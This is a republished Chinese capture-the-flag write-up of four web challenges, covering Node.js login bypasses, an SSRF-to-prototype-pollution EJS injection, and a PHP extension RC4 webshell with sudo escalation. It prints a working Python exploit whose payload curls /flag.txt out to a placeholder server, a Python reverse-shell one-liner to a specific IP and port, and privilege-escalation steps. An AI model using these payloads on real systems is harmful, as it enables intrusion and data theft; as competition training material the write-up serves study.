当前位置: 首页 > news >正文

西湖论剑初赛web wp

news 2025/7/15 10:21:24

Node Magical Login

简单的js代码审计。

Flag分成了两部分。

第一部分:

image-20230212211609948

这里就简单的判断了一下user是否等于admin,直接绕过。

image-20230212211635351

第二部分:

image-20230212211645097

checkcode !== “aGr5AtSp55dRacer”,让其为真,利用数组绕过。

image-20230212211657153

Flag为:DASCTF{235657355 32540557696203746863296}

real_ez_node

找到类似的题目。

几道nodejs题目的分析_GAPPPPP的博客-CSDN博客_nodejs ssrf

里边Node Game这一道也是ssrf。

修改一下里边的代码,利用ssrf打原型链污染,然后ejs模板注入。

Exp:

import requests
import urllib.parsedef encode(a):tmp = u""for i in a:tmp += chr(0x0100+ord(i))return tmppayload = ''' HTTP/1.1POST /copy HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 170{"constructor.prototype.outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('curl http://vps:port -F xx=@/flag.txt');var __tmp2"}
GET / HTTP/1.1
test:'''.replace("\n","\r\n")
payload = encode(payload)
re = requests.get('http://3000.endpoint-9a3d98e7aaf647ae8c64b7007bfc464b.m.ins.cloud.dasctf.com:81/curl?q=' + urllib.parse.quote(payload))
print(re.text)

image-20230212211747125

Flag为:DASCTF{10034776926713905225407173576398}

扭转乾坤

大写一个F即可

image-20230212211811179

DASCTF{407a13a21a6b85b1236b003479468c82}

unusual php

phpinfo发现test的拓展

image-20230212211827292

读php.ini

image-20230212211836461

读取so文件

http://url/?a=read&file=php://filter/convert.base64-encode/resource=/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so

反编译看一下存在对文件进行rc4解密操作

image-20230212211902335

那就对一句话rc4加密

image-20230212211912739

base64解码后保存为exp.php,上传发现需要提权

python -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("81.69.247.186",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20230212211938045

尝试使用sudo发现tty问题,使用python加载一个pty

python3 -c 'import pty;pty.spawn("/bin/sh")'

image-20230212211957870

sudo进行cat,发现需要密码,在etc目录发现sudoers.bak备份文件,发现www用户chmod不需要密码

image-20230212212017741

直接上权限,读flag

flag为:DASCTF{20663467266566204775890084453113}

http://www.lryc.cn/news/4041.html

相关文章:

  • 【YOLOv8/YOLOv7/YOLOv5系列算法改进NO.55】融入美团最新QARepVGG
  • Flutter Windows端打包并生成可安装文件流程
  • 凸优化学习:PART3凸优化问题(持续更新)
  • [ue4] 着色器绑定(Shader Binding)
  • Rust语言之迭代器
  • TreeSet 与 TreeMap And HashSet 与 HashMap
  • Java围棋游戏的设计与实现
  • 第七十三章 使用 irisstat 实用程序监控 IRIS - 使用选项运行 irisstat
  • 【博客619】PromQL如何实现Left joins以及不同metrics之间的复杂联合查询
  • Win11自定义电脑右下角时间显示格式
  • TrueNas篇-trueNas Scale安装
  • element表单搜索框与表格高度自适应
  • MySQL使用技巧整理
  • 七大设计原则之里氏替换原则应用
  • 1行Python代码去除图片水印,网友:一干二净
  • Connext DDS属性配置参考大全(2)
  • 一起Talk Android吧(第四百九十二回:精简版动画)
  • seata源码-全局事务回滚服务端源码
  • 【Vue3源码】第一章 effect和reactive
  • C函数指针
  • 2023同等学力申请硕士计算机综合国考
  • 英语基础-并列句概述
  • 大数据框架之Hadoop:HDFS(一)HDFS概述
  • 20230210组会论文总结
  • Python - 数据容器dict(字典)
  • 傻白探索Chiplet,文献阅读笔记汇总(十二)
  • #电子电气架构——Vector工具常见问题解决三板斧
  • 文本三剑客之grep
  • pwn手记录题1
  • 自动驾驶规划 - Apollo Lattice Planner算法【1】